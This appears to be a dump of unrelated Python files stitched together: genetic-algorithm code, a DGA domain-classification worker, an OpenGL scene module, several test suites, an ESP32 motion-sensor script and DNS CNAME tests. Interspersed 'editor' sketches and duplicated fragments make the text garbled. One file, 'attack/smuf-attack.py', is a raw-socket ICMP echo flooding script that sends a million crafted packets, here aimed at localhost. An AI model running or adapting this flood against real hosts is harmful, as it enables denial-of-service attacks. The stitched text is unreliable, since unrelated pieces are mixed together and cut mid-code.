end_timer = 0
else:
if end_timer > 400:
end_timer = 0
else:
end_timer += 1
        if gen % 100 == 0:
            print(fit_now)
final_gen = old_gen
final_fit = evaluate_fitness_of_all(old_gen, sessions, travel_time, daysotw, timezones, dictionary)
I = np.argmin(final_fit)
fit_opt = final_fit[I]
xopt = final_gen[:,I]+1
endtime = time.time()
all_iterations.append(gen)
all_history.append(best_history)
all_fitness.append(fitness_history)
all_times.append(endtime-start)
xopts.append(xopt.tolist())
fopts.append(fit_opt)
    print(gen)

Project2/python/geneticAlgorithm.py
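# --- Editor's sketch (not part of the original file) ---
# matplotlib is imported above but never used; a plausible use is plotting the
# per-generation best fitness collected in all_fitness by runExperiment. This
# assumes all_fitness is a list of per-run histories (lists of floats), as built
# above; the function name and output filename are arbitrary.
from matplotlib import pyplot as plt

def plot_convergence(all_fitness, outfile="convergence.png"):
    for run_idx, history in enumerate(all_fitness):
        plt.plot(history, label="run %d" % run_idx)
    plt.xlabel("generation")
    plt.ylabel("best fitness (total time)")
    plt.legend()
    plt.savefig(outfile)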
import logging
from typing import Optional
import grpc
import redis
from dgad.grpc import classification_pb2, classification_pb2_grpc
class RedisWorker:
def __init__(
self,
redis_host: str,
redis_port: int,
redis_set: str,
grpc_host: str,
grpc_port: str,
):
self.redis_client = redis.Redis(redis_host, redis_port)
self.redis_set = redis_set
self.grpc_host = grpc_host
self.grpc_port = grpc_port
self.counter = 0
def run(self) -> None:
while True:
domain = self.__redis_get_domain_to_classify__()
if domain:
binary_classification = self.classify_domain(domain)
self.counter += self.__redis_store_classification__(
domain, binary_classification
)
if self.counter % 100 == 0:
logging.critical(
"todo: %s, done: %s",
self.redis_client.scard(self.redis_set),
self.redis_client.dbsize(),
)
logging.debug("%s: %s", domain, binary_classification)
else:
logging.info("waiting for domains...")
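                # NOTE: there is no sleep between iterations, so this loop polls Redis as fast as it can while the set is empty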
def classify_domain(self, domain: str) -> str:
with grpc.insecure_channel(f"{self.grpc_host}:{self.grpc_port}") as channel:
stub = classification_pb2_grpc.ClassifierStub(channel)
response = stub.GetClassification(
classification_pb2.Domain(fqdn=domain), wait_for_ready=True
)
return str(response.binary_classification)
def __redis_get_domain_to_classify__(self) -> Optional[str]:
domain = self.redis_client.spop(name=self.redis_set)
if domain:
return str(domain.decode("UTF-8"))
else:
return None
def __redis_store_classification__(
self, domain: str, binary_classification: str
) -> int:
        return int(self.redis_client.set(name=domain, value=binary_classification))  # type: ignore[arg-type]

redis-worker/dgad_redis_worker/worker.py
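# --- Editor's usage sketch (not part of the original file) ---
# A minimal entry point showing how RedisWorker above would plausibly be wired
# up. Only the constructor signature comes from the class itself; the module
# path is inferred from the repo layout, and the environment-variable names and
# default values are assumptions, not project settings.
import logging
import os

from dgad_redis_worker.worker import RedisWorker

if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    worker = RedisWorker(
        redis_host=os.getenv("REDIS_HOST", "localhost"),
        redis_port=int(os.getenv("REDIS_PORT", "6379")),
        redis_set=os.getenv("REDIS_SET", "domains_to_classify"),
        grpc_host=os.getenv("GRPC_HOST", "localhost"),
        grpc_port=os.getenv("GRPC_PORT", "50054"),
    )
    worker.run()  # blocks forever, classifying domains popped from the Redis set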
from pogle_math import Vector, Matrix4x4, Transform
__author__ = '<NAME>'
__copyright__ = "Copyright 2013, The Python OpenGL Engine"
__license__ = "Closed Source"
__version__ = "0.0.1"
__email__ = "<EMAIL>"
__status__ = "Prototype"
class Light(object):
def __init__(self, pos=Vector(0.0, 0.0, 0.0)):
self.position = pos
class Camera(object):
def __init__(self, proj=None, view=None):
if proj is None:
proj = Matrix4x4()
self.proj = proj
if view is None:
view = Matrix4x4()
self.view = view
self._follow_viewport = False
def lookat(self, eye, center=Vector(0, 0, 0), up=Vector(0, 1, 0)):
self.view = Matrix4x4.lookat(eye, center, up)
@staticmethod
def perspective(fovy, near, far):
cam = Camera(Matrix4x4.perspective(fovy, 1.0, near, far))
cam._near = near
cam._fovy = fovy
cam._far = far
cam._follow_viewport = True
return cam
@staticmethod
def ortho(near, far, width, height):
return Camera(Matrix4x4.ortho(near, far, width, height))
class Scene(object):
""" A scene is a container for all your objects.
Basically, it contains a root node to be rendered, a camera and
0 to 3 directional lights.
"""
def __init__(self, camera=None):
if camera is None:
camera = Camera()
self.passes = []
self.camera = camera
self.lights = []
self._nodes = []
def register_pass(self, pass_):
assert pass_ not in self.passes
self.passes.append(pass_)
def unregister_pass(self, pass_):
assert pass_ in self.passes
self.passes.remove(pass_)
def add_node(self, node):
        assert node.scene is None, 'The node is already attached to a scene'
self._nodes.append(node)
node.scene = self
self.mark_renderlist_as_dirty()
def mark_renderlist_as_dirty(self):
for p in self.passes:
p.mark_renderlist_as_dirty()
def remove_node(self, node):
assert node.scene == self, 'The node is not attached to this scene'
self._nodes.remove(node)
node.scene = None
self.mark_renderlist_as_dirty()
def add_light(self, light):
self.lights.append(light)
def get_nodes(self, flag):
""" A method returning a list of all nodes having the flag 'flag'
flag -- The flag that must be present on all nodes returned
"""
match = []
for n in self._nodes:
if n.has_flag(flag):
match.append(n)
return match
def get_nodes_i(self, flag):
""" A generator method returning all nodes having the flag 'flag'
flag -- The flag that must be present on all nodes returned
"""
for n in self._nodes:
if n.has_flag(flag):
yield n
def __len__(self):
return len(self._nodes)
@property
def nodes(self):
return self._nodes
class SceneNode(object):
    """ A basic base class for all node types
    """
    NODE_HAS_GEOMETRY = 1
def __init__(self, transform=None, flags=0x00000000):
self.name = ''
self.flags = flags
        # Trick to avoid a single default-arg instantiation shared by all nodes:
        # if the default arg were Transform(), every node that doesn't specify
        # the transform arg would end up sharing the one object created at
        # import time. Not what we want here.
if transform is None:
transform = Transform()
self.transform = transform
self.scene = None
def has_flag(self, flag):
        return (self.flags & flag) != 0

pogle/pogle_scene.py
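# --- Editor's usage sketch (not part of the original file) ---
# Shows how the Scene, Camera, Light and SceneNode classes above fit together,
# assuming this module is importable as pogle.pogle_scene (per the repo path).
# The camera parameters and positions are arbitrary.
from pogle_math import Vector
from pogle.pogle_scene import Camera, Light, Scene, SceneNode

camera = Camera.perspective(fovy=60.0, near=0.1, far=100.0)
camera.lookat(eye=Vector(0.0, 2.0, 5.0))
scene = Scene(camera=camera)
scene.add_light(Light(pos=Vector(10.0, 10.0, 10.0)))
node = SceneNode(flags=SceneNode.NODE_HAS_GEOMETRY)
scene.add_node(node)
assert len(scene) == 1
assert scene.get_nodes(SceneNode.NODE_HAS_GEOMETRY) == [node]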
import pytest
import icat
import icat.config
from icat.ids import DataSelection
from conftest import getConfig
@pytest.fixture(scope="module")
def client(setupicat):
client, conf = getConfig()
client.login(conf.auth, conf.credentials)
return client
# parameter lists
param_ids = [
([42], [], []),
([], [47,11], []),
([], [], [6,666,66]),
([42], [47,11], [6,666,66]),
]
param_queries = [
("Investigation [name = '10100601-ST']"),
("Dataset <-> Investigation [name = '10100601-ST']"),
("Datafile <-> Dataset <-> Investigation [name = '10100601-ST']"),
("SELECT dc FROM DataCollection dc "
"INCLUDE dc.dataCollectionDatafiles AS dcdf, dcdf.datafile, "
"dc.dataCollectionDatasets AS dcds, dcds.dataset"),
]
def get_obj_ids(objs):
"""Return a tuple (invIds, dsIds, dfIds) from a list of objects.
"""
invIds = set()
dsIds = set()
dfIds = set()
for o in objs:
if o.BeanName == "Investigation":
invIds.add(o.id)
elif o.BeanName == "Dataset":
dsIds.add(o.id)
elif o.BeanName == "Datafile":
dfIds.add(o.id)
elif o.BeanName == "DataCollection":
for dcds in o.dataCollectionDatasets:
if dcds.dataset:
dsIds.add(dcds.dataset.id)
for dcdf in o.dataCollectionDatafiles:
if dcdf.datafile:
dfIds.add(dcdf.datafile.id)
else:
raise ValueError("Invalid object <%r>" % o)
return (invIds, dsIds, dfIds)
@pytest.mark.parametrize(("invIds", "dsIds", "dfIds"), param_ids)
def test_id_dict(invIds, dsIds, dfIds):
"""Initialize a DataSelection from a dict with object ids.
"""
objs = {
'investigationIds': invIds,
'datasetIds': dsIds,
'datafileIds': dfIds
}
selection = DataSelection(objs)
assert selection.invIds == set(invIds)
assert selection.dsIds == set(dsIds)
assert selection.dfIds == set(dfIds)
@pytest.mark.parametrize(("query"), param_queries)
def test_objlist(client, query):
"""Initialize a DataSelection from a list of objects.
"""
objs = client.search(query)
invIds, dsIds, dfIds = get_obj_ids(objs)
selection = DataSelection(objs)
assert selection.invIds == invIds
assert selection.dsIds == dsIds
assert selection.dfIds == dfIds
def test_entitylist(client):
"""Initialize a DataSelection from an EntityList.
    The constructor of DataSelection used to be overly strict: only
    lists of objects were accepted, while other sequence types such as
    an EntityList were rejected.  (Fixed in 957b0c0.)
"""
query = "Investigation INCLUDE Dataset [name = '10100601-ST']"
inv = client.assertedSearch(query)[0]
objs = inv.datasets
assert not isinstance(objs, list)
invIds, dsIds, dfIds = get_obj_ids(objs)
selection = DataSelection(objs)
assert selection.invIds == invIds
assert selection.dsIds == dsIds
assert selection.dfIds == dfIds
@pytest.mark.parametrize(("query"), param_queries)
def test_set(client, query):
"""Initialize a DataSelection from a set of objects.
Newer versions of python-icat allow a DataSelection to be created
from any iterator of objects (not from a Mapping though), in
particular from a set.
"""
objs = client.search(query)
invIds, dsIds, dfIds = get_obj_ids(objs)
s = set(objs)
selection = DataSelection(s)
assert selection.invIds == invIds
assert selection.dsIds == dsIds
assert selection.dfIds == dfIds
@pytest.mark.parametrize(("query"), param_queries)
def test_generator(client, query):
"""Initialize a DataSelection from a generator of objects.
Newer versions of python-icat allow a DataSelection to be created
from any iterator of objects (not from a Mapping though), in
particular from a generator.
"""
def objgenerator(it):
"""Admittedly stupid example for a generator function.
"""
for o in it:
yield o
objs = client.search(query)
invIds, dsIds, dfIds = get_obj_ids(objs)
g = objgenerator(objs)
selection = DataSelection(g)
assert selection.invIds == invIds
assert selection.dsIds == dsIds
assert selection.dfIds == dfIds
@pytest.mark.parametrize(("invIds", "dsIds", "dfIds"), param_ids)
def test_selection(invIds, dsIds, dfIds):
"""Initialize a DataSelection from another DataSelection.
"""
objs = {
'investigationIds': invIds,
'datasetIds': dsIds,
'datafileIds': dfIds
}
sel1 = DataSelection(objs)
assert sel1.invIds == set(invIds)
assert sel1.dsIds == set(dsIds)
assert sel1.dfIds == set(dfIds)
sel2 = DataSelection(sel1)
assert sel2.invIds == set(invIds)
assert sel2.dsIds == set(dsIds)
    assert sel2.dfIds == set(dfIds)

tests/test_07_dataselection.py
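# --- Editor's sketch (not part of the original file) ---
# The id-dict form exercised by test_id_dict above, outside of pytest; it only
# assumes python-icat is installed, and the ids are arbitrary.
from icat.ids import DataSelection

selection = DataSelection({'investigationIds': [42], 'datasetIds': [47, 11], 'datafileIds': [6]})
assert selection.invIds == {42}
assert selection.dsIds == {47, 11}
assert selection.dfIds == {6}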
# pylint: enable=line-too-long
from unittest import TestCase
from unittest import main as launch_tests
from unittest.mock import patch
from PyFunceble.abstracts import Version
class TestVersion(TestCase):
"""
Tests of PyFunceble.abstracts.Version
"""
def test_split_version(self):
"""
Tests the case that we want to split the version.
"""
given = "1.0.0.dev (Hello, World!)"
expected = ["1", "0", "0"]
actual = Version.split_versions(given)
self.assertEqual(expected, actual)
def test_split_version_with_non_digits(self):
"""
Tests the case that we want to split the version
but also have the code name.
"""
given = "1.0.0.dev (Hello, World!)"
expected = (["1", "0", "0"], "dev (Hello, World!)")
actual = Version.split_versions(given, return_non_digits=True)
self.assertEqual(expected, actual)
def test_literal_comparison(self):
"""
Tests the literal comparison.
"""
given = "1.0.0.dev (Hello, World!)"
expected = True
actual = Version.literally_compare(given, given)
self.assertEqual(expected, actual)
def test_literal_comparison_different(self):
"""
        Tests the literal comparison for the case that both given versions are different.
"""
given = "1.0.0.dev (Hello, World!)"
expected = False
actual = Version.literally_compare(given, given.replace(".", "_"))
self.assertEqual(expected, actual)
@patch("PyFunceble.abstracts.Package.VERSION", "1.0.0.dev (Hello, World)")
def test_compare_local_version_is_same(self):
"""
        Tests the comparison for the case that the local version is the same.
"""
given = "1.0.0.dev (Hello, World)"
expected = None
actual = Version.compare(given)
self.assertEqual(expected, actual)
@patch("PyFunceble.abstracts.Package.VERSION", "1.50.0.dev (Hello, World)")
def test_compare_local_version_is_older(self):
"""
Tests the comparison for the case that the local version is older.
"""
given = "2.34.0.dev (Hello, World)"
expected = True
actual = Version.compare(given)
self.assertEqual(expected, actual)
@patch("PyFunceble.abstracts.Package.VERSION", "2.10.0.dev (Hello, World)")
def test_compare_local_version_is_newer(self):
"""
        Tests the comparison for the case that the local version is newer.
"""
given = "1.15.0.dev (Hello, World)"
expected = False
actual = Version.compare(given)
self.assertEqual(expected, actual)
@patch("PyFunceble.abstracts.Package.VERSION", "2.10.0.dev (Hello, World)")
def test_is_local_dev(self):
"""
Tests if the local version is the dev one.
"""
expected = True
actual = Version.is_local_dev()
self.assertEqual(expected, actual)
@patch("PyFunceble.abstracts.Package.VERSION", "2.10.0. (Hello, World)")
def test_is_not_local_dev(self):
"""
        Tests if the local version is not the dev one.
"""
expected = False
actual = Version.is_local_dev()
self.assertEqual(expected, actual)
if __name__ == "__main__":
    launch_tests()

tests/test_abstracts_package.py
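# --- Editor's sketch (not part of the original file) ---
# How the tri-state return of Version.compare exercised above would typically be
# consumed (True: upstream is newer, False: local is newer, None: same version).
# The function name and message strings are illustrative only.
from PyFunceble.abstracts import Version

def describe_upstream(upstream_version):
    upstream_is_newer = Version.compare(upstream_version)
    if upstream_is_newer is None:
        return "already up to date"
    if upstream_is_newer:
        return "update available"
    return "running a newer version than upstream"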
import time
import utime
import machine  # import the whole library
from machine import Pin
from umqttsimple import MQTTClient
import network
import gc
gc.enable()  # enable automatic garbage collection
# set a slower clock speed: 20MHz, 40MHz, 80MHz, 160MHz or 240MHz
machine.freq(80000000)
print ("Prosessorin nopeus asetettu: %s" %machine.freq())
# The Raspberry Pi WiFi is poor, and in addition the Pi has to ping the ESP32 for the connection to work!
sta_if = network.WLAN(network.STA_IF)
# import the parameters from the file parametrit.py
from parametrit import CLIENT_ID, MQTT_SERVERI, MQTT_PORTTI, MQTT_KAYTTAJA, \
MQTT_SALASANA, PIR_PINNI, AIHE_LIIKETUNNISTIN
client = MQTTClient(CLIENT_ID, MQTT_SERVERI, MQTT_PORTTI, MQTT_KAYTTAJA, MQTT_SALASANA)
# Motion sensor pin
pir = Pin(PIR_PINNI, Pin.IN)
def ratkaise_aika():
(vuosi, kuukausi, kkpaiva, tunti, minuutti, sekunti, viikonpva, vuosipaiva) = utime.localtime()
paivat = {0: "Ma", 1: "Ti", 2: "Ke", 3: "To", 4: "Pe", 5: "La", 6: "Su"}
kuukaudet = {1: "Tam", 2: "Hel", 3: "Maa", 4: "Huh", 5: "Tou", 6: "Kes", 7: "Hei", 8: "Elo",
9: "Syy", 10: "Lok", 11: "Mar", 12: "Jou"}
#.format(paivat[viikonpva]), format(kuukaudet[kuukausi]),
aika = "%s.%s.%s klo %s:%s:%s" % (kkpaiva, kuukausi, \
vuosi, "{:02d}".format(tunti), "{:02d}".format(minuutti), "{:02d}".format(sekunti))
return aika
def mqtt_palvelin_yhdista():
aika = ratkaise_aika()
if sta_if.isconnected():
try:
client.set_callback(viestin_saapuessa)
client.connect()
client.subscribe(AIHE_LIIKETUNNISTIN)
except OSError as e:
print("% s: Ei voida yhdistaa! " % aika)
restart_and_reconnect()
return False
return True
else:
print("%s: Yhteys on poikki! " % aika)
restart_and_reconnect()
return False
def viestin_saapuessa():
    ''' This is not needed, but could be used in a situation where an MQTT message arrives '''
vilkuta_ledi(1)
return
def laheta_pir(status):
aika = ratkaise_aika()
if sta_if.isconnected():
try:
            client.publish(AIHE_LIIKETUNNISTIN, str(status))  # 1 = motion detected, 0 = motion ended
except OSError as e:
print("% s: Ei voida yhdistaa! " % aika)
restart_and_reconnect()
return False
return True
else:
print("%s: Yhteys on poikki! " % aika)
restart_and_reconnect()
return False
def vilkuta_ledi(kertaa):
ledipinni = machine.Pin(2, machine.Pin.OUT)
for i in range(kertaa):
ledipinni.on()
utime.sleep_ms(100)
ledipinni.off()
utime.sleep_ms(100)
return
def restart_and_reconnect():
aika = ratkaise_aika()
print('%s: Ongelmia. Boottaillaan 5s kuluttua.' % aika)
vilkuta_ledi(10)
time.sleep(5)
machine.reset()
    # reboot the board
def alustus():
    # initialization
mqtt_palvelin_yhdista()
def seuraa_liiketta():
alustus()
on_aika = utime.time()
off_aika = utime.time()
ilmoitettu_on = False
ilmoitettu_off = False
while True:
pir_tila = pir.value()
if (pir_tila == 0) and (ilmoitettu_off == False):
            ''' Clear the notification '''
off_aika = utime.time()
print("Ilmoitettu liikkeen lopusta. Liike kesti %s" %(off_aika - on_aika))
laheta_pir(0)
ilmoitettu_off = True
ilmoitettu_on = False
elif (pir_tila == 1) and (ilmoitettu_on == False):
            ''' Motion detected! '''
on_aika = utime.time()
print("Ilmoitetaan liikkeesta!")
laheta_pir(1)
ilmoitettu_on = True
ilmoitettu_off = False
        # keep the processor load down
time.sleep(0.01)
if __name__ == "__main__":
    seuraa_liiketta()

esp32-liiketunnistus/main.py
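# --- Editor's sketch (not part of the original project) ---
# main.py above imports its settings from parametrit.py, which is not included
# in this dump. A minimal stand-in with the names the import expects; every
# value below is a placeholder, not a real credential, pin number or topic.
# parametrit.py
CLIENT_ID = "esp32-pir-1"
MQTT_SERVERI = "192.168.1.10"   # MQTT broker address
MQTT_PORTTI = 1883              # MQTT broker port
MQTT_KAYTTAJA = "mqtt-user"     # MQTT username
MQTT_SALASANA = "change-me"     # MQTT password
PIR_PINNI = 27                  # GPIO pin the PIR sensor is wired to
AIHE_LIIKETUNNISTIN = "home/motion"  # MQTT topic for motion events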
import sys, socket
from struct import *
def carry_around_add(a, b):
c = a + b
return (c & 0xffff) + (c >> 16)
def checksum(msg):
s = 0
for i in range(0, len(msg), 2):
w = (ord(msg[i]) << 8 ) + ord(msg[i+1])
s = carry_around_add(s, w)
return ~s & 0xffff
try:
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
except socket.error,msg:
print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
ip_source = '127.0.0.1'  # local IP
ip_dest = '127.0.0.1'    # a domain name also works: socket.gethostbyname('www.microsoft.com')
# Fill in the IP header
ip_ver = 4  # ipv4
ip_ihl = 5  # Header Length = 5, i.e. no options part
ip_dscp = 0  # formerly called tos, now called dscp
ip_total_len = 0  # left for kernel to fill
ip_id = 22222  # fragmentation related, any value will do
ip_frag_offset = 0  # fragmentation related
ip_ttl = 255  # TTL is usually 255 on *nix
ip_protocol = socket.IPPROTO_ICMP  # the data that follows is an ICMP message
ip_checksum = 0  # left for kernel to fill
ip_saddr = socket.inet_pton(socket.AF_INET, ip_source)  # the two endpoint IP addresses
ip_daddr = socket.inet_pton(socket.AF_INET, ip_dest)
ip_ver_ihl = (ip_ver << 4) + ip_ihl  # merge the two 4-bit values into one byte
# Build the ip_header according to the layout described above.
ip_header = pack('!BBHHHBBH4s4s', ip_ver_ihl, ip_dscp, ip_total_len, ip_id, ip_frag_offset, ip_ttl, ip_protocol, ip_checksum, ip_saddr, ip_daddr)
icmp_type = 8  # ICMP type and code: echo request is type 8, code 0
icmp_code = 0
icmp_checksum = 0  # ICMP checksum (computed below)
icmp_id = 0  # ICMP identifier
icmp_seq = 0  # ICMP sequence number
# Build the icmp_header according to the layout described above
# (type and code are one byte each, hence '!BBHHH').
icmp_header = pack('!BBHHH', icmp_type, icmp_code, icmp_checksum, icmp_id, icmp_seq)
# Write something as the (optional) data part
payload_data = 'wordpress.youran.me'
# Build a pseudo IP header (not required for the ICMPv4 checksum; left in place)
psh_saddr = ip_saddr
psh_daddr = ip_daddr
psh_reserved = 0
psh_protocol = ip_protocol
psh_tcp_len = len(icmp_header) + len(payload_data)
psh = pack('!4s4sBBH', psh_saddr, psh_daddr, psh_reserved, psh_protocol, psh_tcp_len)
# Build the content the checksum is computed over. Unlike TCP/UDP, the ICMPv4
# checksum covers only the ICMP header plus data, with no pseudo header.
chk = icmp_header + payload_data
# Append one byte of padding if needed
if len(chk) % 2 != 0:
    chk += '\0'
icmp_checksum = checksum(chk)
# Rebuild the icmp_header with the checksum result filled in
icmp_header = pack('!BBHHH', icmp_type, icmp_code, icmp_checksum, icmp_id, icmp_seq)
# The final IP/ICMP packet!
packet = ip_header + icmp_header + payload_data
# Send the packets out
i = 0
while True:
i = i+1
s.sendto(packet, (ip_dest, 0))
if i ==1000000:
break

attack/smuf-attack.py
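# --- Editor's check (not part of the original file) ---
# Sanity check for the checksum() helper above against the worked example in
# RFC 1071 (data bytes 00 01 f2 03 f4 f5 f6 f7 give checksum 0x220d). Python 2,
# like the script above, and assumes checksum() is in scope.
sample = '\x00\x01\xf2\x03\xf4\xf5\xf6\xf7'
assert checksum(sample) == 0x220d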
from django.core.exceptions import ValidationError
import cyder.base.tests
from cyder.cydns.domain.models import Domain
from cyder.cydns.nameserver.models import Nameserver
from cyder.cydns.mx.models import MX
from cyder.cydns.srv.models import SRV
from cyder.cydns.txt.models import TXT
from cyder.cydns.ptr.models import PTR
from cyder.cydns.cname.models import CNAME
from cyder.cydns.address_record.models import AddressRecord
from cyder.cydhcp.interface.static_intr.models import StaticInterface
from cyder.cydns.ip.utils import ip_to_domain_name
from cyder.cydns.tests.utils import create_fake_zone
from cyder.core.system.models import System
class CNAMETests(cyder.base.tests.TestCase):
def create_domain(self, name, ip_type=None, delegated=False):
if ip_type is None:
ip_type = '4'
if name in ('arpa', 'in-addr.arpa', 'ip6.arpa'):
pass
else:
name = ip_to_domain_name(name, ip_type=ip_type)
d = Domain(name=name, delegated=delegated)
d.clean()
self.assertTrue(d.is_reverse)
return d
def setUp(self):
self.g = create_fake_zone("gz", suffix="")
self.c_g = create_fake_zone("coo.gz", suffix="")
self.d = create_fake_zone("dz", suffix="")
self.r1 = create_fake_zone("10.in-addr.arpa", suffix="")
self.r1.save()
self.s = System()
self.s.save()
def do_add(self, label, domain, data):
cn = CNAME(label=label, domain=domain, target=data)
cn.full_clean()
cn.save()
cn.save()
self.assertTrue(cn.details())
cs = CNAME.objects.filter(
label=label, domain=domain, target=data)
self.assertEqual(len(cs), 1)
return cn
def test_add(self):
label = "foo"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
label = "boo"
domain = self.c_g
data = "foo.foo.com"
self.do_add(label, domain, data)
label = "fo1"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
self.assertRaises(ValidationError, self.do_add, *(label, domain, data))
label = "hooo"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
def test1_add_glob(self):
label = "*foo"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
label = "*"
domain = self.c_g
data = "foo.foo.com"
self.do_add(label, domain, data)
label = "*.fo1"
domain = self.g
data = "foo.com"
self.assertRaises(ValidationError, self.do_add, *(label, domain, data))
label = "*sadfasfd-asdf"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
def test2_add_glob(self):
label = "*coo"
domain = self.g
data = "foo.com"
self.do_add(label, domain, data)
label = "*"
domain = self.c_g
data = "foo.com"
self.do_add(label, domain, data)
def test_soa_condition(self):
label = ""
domain = self.c_g
data = "foo.com"
self.assertRaises(ValidationError, self.do_add, *(label, domain, data))
def test_add_bad(self):
label = ""
domain = self.g
data = "..foo.com"
self.assertRaises(ValidationError, self.do_add, *(label, domain, data))
def test_add_mx_with_cname(self):
label = "cnamederp1"
domain = self.c_g
data = "foo.com"
fqdn = label + '.' + domain.name
mx_data = {'label': '', 'domain': self.c_g, 'server':
fqdn, 'priority': 2, 'ttl': 2222}
mx = MX(**mx_data)
mx.save()
cn = CNAME(label=label, domain=domain, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_address_record_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec, _ = AddressRecord.objects.get_or_create(
label=label, domain=dom, ip_type='4', ip_str="172.16.58.3")
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_address_record_exists_upper_case(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec, _ = AddressRecord.objects.get_or_create(
label=label, domain=dom, ip_type='4', ip_str="172.16.58.3")
cn = CNAME(label=label.title(), domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_address_record_cname_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
CNAME.objects.get_or_create(
label=label, domain=dom, target=data
)
rec = AddressRecord(label=label, domain=dom, ip_str="172.16.58.3")
self.assertRaises(ValidationError, rec.save)
def test_srv_exists(self):
label = "_testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec, _ = SRV.objects.get_or_create(
label=label, domain=dom, target="asdf",
port=2, priority=2, weight=4)
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_srv_cname_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
CNAME.objects.get_or_create(
label=label, domain=dom, target=data)
rec = SRV(label=label, domain=dom, target="asdf",
port=2, priority=2, weight=4)
self.assertRaises(ValidationError, rec.save)
def test_txt_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec, _ = TXT.objects.get_or_create(
label=label, domain=dom, txt_data="asdf")
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_txt_cname_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
cn, _ = CNAME.objects.get_or_create(
label=label, domain=dom, target=data)
cn.full_clean()
cn.save()
rec = TXT(label=label, domain=dom, txt_data="asdf1")
self.assertRaises(ValidationError, rec.save)
def test_mx_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec, _ = MX.objects.get_or_create(
label=label, domain=dom, server="asdf",
priority=123, ttl=123)
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_mx_cname_exists(self):
# Duplicate test?
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
cn, _ = CNAME.objects.get_or_create(
label=label, domain=dom, target=data)
cn.full_clean()
cn.save()
rec = MX(label=label, domain=dom, server="asdf1",
priority=123, ttl=123)
self.assertRaises(ValidationError, rec.save)
def test_ns_exists(self):
# Duplicate test?
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec = Nameserver(domain=dom, server="asdf1")
rec.save()
cn = CNAME(label='', domain=dom, target=data)
self.assertRaises(ValidationError, cn.clean)
def test_ns_cname_exists(self):
# Duplicate test?
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
cn, _ = CNAME.objects.get_or_create(
label='', domain=dom, target=data)
cn.full_clean()
cn.save()
rec = Nameserver(domain=dom, server="asdf1")
self.assertRaises(ValidationError, rec.save)
def test_intr_exists(self):
label = "tdfestyfoo"
data = "waasdft"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
intr = StaticInterface(label=label, domain=dom, ip_str="10.0.0.1",
ip_type='4', system=self.s,
mac="11:22:33:44:55:66")
intr.clean()
intr.save()
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_intr_cname_exists(self):
# Duplicate test?
label = "tesafstyfoo"
data = "wadfakt"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
cn, _ = CNAME.objects.get_or_create(
label=label, domain=dom, target=data)
cn.full_clean()
cn.save()
intr = StaticInterface(
label=label, domain=dom, ip_str="10.0.0.2", ip_type='4',
system=self.s, mac="00:11:22:33:44:55"
)
self.assertRaises(ValidationError, intr.clean)
cn.label = "differentlabel"
cn.save()
intr.clean()
intr.save()
def test_ptr_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
rec = PTR(ip_str="10.193.1.1", ip_type='4', name='testyfoo.what.cd')
rec.full_clean()
rec.save()
cn = CNAME(label=label, domain=dom, target=data)
self.assertRaises(ValidationError, cn.full_clean)
def test_ptr_cname_exists(self):
label = "testyfoo"
data = "wat"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
CNAME.objects.get_or_create(label=label, domain=dom, target=data)
rec = PTR(ip_str="10.193.1.1", ip_type='4', name='testyfoo.what.cd')
self.assertRaises(ValidationError, rec.clean)
def test_cname_point_to_itself(self):
label = "foopy"
data = "foopy.what.cd"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
cn = CNAME(label=label, domain=dom, target=data)
        self.assertRaises(ValidationError, cn.clean)

cyder/cydns/cname/tests/test_models.py
label = "foopy"
data = "foopy.what.cd"
dom, _ = Domain.objects.get_or_create(name="cd")
dom, _ = Domain.objects.get_or_create(name="what.cd")
cn = CNAME(label=label, domain=dom, target=data)
